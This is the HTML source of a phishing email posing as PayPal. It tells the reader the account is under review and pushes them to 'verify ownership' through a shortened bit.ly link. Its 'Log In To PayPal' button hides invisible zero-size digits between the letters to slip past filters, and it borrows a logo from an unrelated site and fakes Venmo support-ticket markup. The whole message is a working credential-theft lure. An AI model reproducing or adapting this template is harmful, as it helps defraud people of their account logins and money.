<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<style type="text/css">
a{
font-weight:bold;
font-size:13px;
color:#000000;
text-decoration:none;
}
table td {
border-collapse: collapse;
}
</style>
</head>
<body style="background: #ffffff; width:50%;height:50%;font-size:13px;font-family:Arial, Arial !important;">

<table class="showme" cellspacing="0" cellpadding="0" border="0" width="500px" style="margin:auto;border:1px solid #00457C;border-radius:5px">
<tr>
<td style="text-align:center;padding:10px 0 20px 0;">
<a href="#"> <img src="https://esportbetweb.com/wp-content/uploads/2018/07/paypal-5.svg" alt="Please enable images" width="275" height="54"></a>
</td>
</tr>
<tr>
<td>
<table class="showme" cellspacing="0" cellpadding="0" border="0" width="100%">
<tr>
<td style="text-align:left;padding:10px 30px;padding-top:0;background-color:#FEFEFE;line-height: 18px;color:#00457C;font-size:13px;border-radius: 8px"><div style="margin-top: 25px" data-version="2">
<table class="showme" width="100%" cellpadding="0" cellspacing="0" border="0" role="presentation">
<tr>
<td width="100%" style="padding: 15px 0; padding-top:0">
<table class="showme" width="100%" cellpadding="0" cellspacing="0" border="0" style="table-layout:fixed;" role="presentation">
<tr>
<td width="100%" style="padding: 0; margin: 0;" valign="top">
<div class="zd-comment" dir="auto" style="color: #2b2e2f; font-family: Arial, !important; font-size: 14px; line-height: 22px; margin: 15px 0">Dear Customer,<br><br>Recent activity on your account has raised some flags in our system, so we are temporarily reviewing your account. As a precaution, please prove your PayPal account ownership and it will be instantly restored.<br><br>For your convenience, we have included a link to proceed with the verification: <br><br>
<table class="showme" border="0" cellspacing="0" cellpadding="0" style="color:#ffffff !important;text-align: center;width: 50%;margin-left: 25%">
<tbody><tr>
<!-- CTA text 17/21 -->
<td bgcolor="#0079C1" align="center" valign="middle" style="padding:10px; display: block; color:#ffffff !important; text-decoration:none; white-space: nowrap; -webkit-print-color-adjust: exact; display: block; font-family:Arial, 'sans-serif'; line-height:21px; color:#ffffff !important;border-radius:25px;letter-spacing: .5px;font-weight: 300">
<a href="https://bit.ly/35yHHcW" style="text-decoration:none;color:#ffffff !important; white-space: nowrap;font-size:14px;" target="_BLANK">L<font style='color:transparent;font-size:0px'>39</font>o<font style='color:transparent;font-size:0px'>88</font>g<font style='color:transparent;font-size:0px'>78</font> <font style='color:transparent;font-size:0px'>16</font>I<font style='color:transparent;font-size:0px'>94</font>n<font style='color:transparent;font-size:0px'>08</font> <font style='color:transparent;font-size:0px'>04</font>T<font style='color:transparent;font-size:0px'>54</font>o<font style='color:transparent;font-size:0px'>70</font> <font style='color:transparent;font-size:0px'>29</font>P<font style='color:transparent;font-size:0px'>02</font>a<font style='color:transparent;font-size:0px'>53</font>y<font style='color:transparent;font-size:0px'>64</font>P<font style='color:transparent;font-size:0px'>40</font>a<font style='color:transparent;font-size:0px'>06</font>l<font style='color:transparent;font-size:0px'>22</font></a>
</td>
<!-- end CTA text --></tr>
</tbody></table>
<br>
After finishing the process, we will come back to you in 2 business days with the verification result.<br><br>Thank you,<br><br><div class="signature"><p dir="auto" style="color: #2b2e2f; font-family: 'Lucida Sans Unicode', 'Lucida Grande', 'Tahoma', Verdana, sans-serif; font-size: 14px; line-height: 22px; margin: 15px 0">PayPal</p></div></div><p>
</p></td> </tr> </table> </td> </tr></table></div>
</td>
</tr>
<tr>
</tr>
<tr>
<td style="color:#000000;font-size:13px;text-align:center;padding-top:5px;">
<a href="https://venmo.zendesk.com"></a>
</td>
</tr>
</table>
</td>
</tr>
</table>
<span style="color:#FFFFFF" aria-hidden="true">[Q54OLW-Z7Q4]</span>
</body>
</html><div itemscope="" itemtype="http://schema.org/EmailMessage" style="display:none">
<div itemprop="action" itemscope="" itemtype="http://schema.org/ViewAction"> <link itemprop="url" href="https://help.venmo.com/hc/requests/15084761"> <meta itemprop="name" content="Viewticket"> </div></div>